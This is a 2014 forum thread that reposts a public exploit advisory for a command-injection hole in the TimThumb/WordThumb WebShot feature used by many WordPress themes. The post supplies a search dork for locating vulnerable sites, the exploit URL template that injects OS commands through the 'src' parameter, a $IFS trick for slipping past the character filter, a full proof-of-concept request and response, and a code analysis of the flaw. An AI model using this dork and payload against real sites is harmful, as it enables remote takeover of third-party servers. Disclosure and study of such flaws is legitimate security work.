sniffer Posted June 27, 2014 Report Posted June 27, 2014 exploit : http://www.exploit-db.com/exploits/33851/news : Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk - The Hacker NewsDork : inurl:"/themify/" intitle:"index of /" ####################################################################### _ ___ _ _ ____ ____ _ _____# | | / _ \| \ | |/ ___|/ ___| / \|_ _|# | | | | | | \| | | _| | / _ \ | |# | |__| |_| | |\ | |_| | |___ / ___ \| |# |_____\___/|_| \_|\____|\____/_/ \_\_|## Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)# Affected website : a lot Wordpress Themes, Plugins, 3rd party components# Exploit Author : @u0x (Pichaya Morimoto)# Release dates : June 24, 2014## Special Thanks to 2600 Thailand group# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/#########################################################################[+] Description============================================================TimThumb is a small php script for cropping, zooming and resizing webimages (jpg, png, gif). Perfect for use on blogs and other applications.Developed for use in the WordPress theme Mimbo Pro, and since used in manyother WordPress themes.http://www.binarymoon.co.uk/projects/timthumb/https://code.google.com/p/timthumb/The original project WordThumb 1.07 also vulnerable (https://code.google.com/p/wordthumb/)They both shared exactly the same WebShot code! And there are severalprojects that shipped with "timthumb.php", such as,Wordpress Gallery Pluginhttps://wordpress.org/plugins/wordpress-gallery-plugin/IGIT Posts Slider Widgethttp://wordpress.org/plugins/igit-posts-slider-widget/All themes from http://themify.me/ contains vulnerable "wordthumb" in"<theme-name>/themify/img.php".[+] Exploit============================================================http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>)** Note that OS commands payload MUST be within following character sets:[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]** Spaces, Pipe, GT sign are not allowed.** This WebShot feature is DISABLED by default.** CutyCapt and XVFB must be installed in constants.[+] Proof-of-Concept============================================================There are couple techniques that can be used to bypass limited charsets butI will use a shell variable $IFS insteads of space in this scenario.PoC Environment:Ubuntu 14.04 LTSPHP 5.5.9Wordpress 3.9.1Themify Parallax Theme 1.5.2WordThumb 1.07Crafted Exploit:http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1Host: longcatlab.localProxy-Connection: keep-aliveCache-Control: max-age=0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/35.0.1916.153 Safari/537.36Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Cookie: woocommerce_recently_viewed=9%7C12%7C16;wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685HTTP/1.1 400 Bad RequestDate: Tue, 24 Jun 2014 07:20:48 GMTServer: ApacheX-Powered-By: PHP/5.5.9-1ubuntu4X-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 3059Connection: closeContent-Type: text/html…<a href='http://www.php.net/function.getimagesize'target='_new'>getimagesize</a>( )</td><tdtitle='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr></table></font><h1>A WordThumb error has occured</h1>The following error(s) occured:<br/><ul><li>The image being resized is not a valid gif, jpg orpng.</li></ul><br /><br />Query String : webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :1.07</pre>Even it response with error messages but injected OS command has alreadybeen executed.$ ls /tmp/longcat -lha- -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat[+] Vulnerability Analysis============================================================https://timthumb.googlecode.com/svn/trunk/timthumb.phpFilename: timthumb.phpif(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT','/usr/local/bin/CutyCapt');if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');...timthumb::start(); ? start script...public static function start(){$tim = new timthumb(); ? create timthumb object, call __construct()...$tim->run();...public function __construct(){...$this->src = $this->param('src'); ? set "src" variable to HTTP GET "src"parameter…if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){...$this->isURL = true; ? prefix http/s result in isURL = true}...protected function param($property, $default = ''){if (isset ($_GET[$property])) {return $_GET[$property];...public function run(){if($this->isURL){...if($this->param('webshot')){ ? HTTP GET "webshot" must submittedif(WEBSHOT_ENABLED){ ? this pre-defined constant must be true...$this->serveWebshot(); ? call webshot feature} else {...protected function serveWebshot(){...if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycaptreturn $this->error("CutyCapt is not installed. $instr");}if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfbreturn $this->Error("Xvfb is not installed. $instr");}...$url = $this->src;if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check validURL #LoLreturn $this->error("Invalid URL supplied.");}$url =preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/','', $url); ? check valid URL as specified in RFC 3986http://www.ietf.org/rfc/rfc3986.txt...if(WEBSHOT_XVFB_RUNNING){putenv('DISPLAY=:100.0');$command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"--javascript=$jsOn --java=$javaOn --plugins=$pluginsOn--js-can-open-windows=off --url=\"$url\" --out-format=$format--out=$tempfile"; ? OS shell command injection} else {$command = "$xv --server-args=\"-screen 0,{$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout--user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn--js-can-open-windows=off --url=\"$url\" --out-format=$format--out=$tempfile"; ? OS shell command injection}...$out = `$command`; ? execute $command as shell command"PHP supports one execution operator: backticks (``). Note that these arenot single-quotes! PHP will attempt to execute the contents of thebackticks as a shell command." -http://www.php.net//manual/en/language.operators.execution.php"$url" is failed to escape "$()" in "$command" which is result in arbitrarycode execution.Jabber : Sniffer@jabber.ruSkype : Ali_Sniffer 1 Quote
r_m_a Posted June 27, 2014 Report Posted June 27, 2014 A WordThumb error has occuredThe following error(s) occured: You added the webshot parameter but webshots are disabled on this server. You need to set WEBSHOT_ENABLED == true to enable webshots. Quote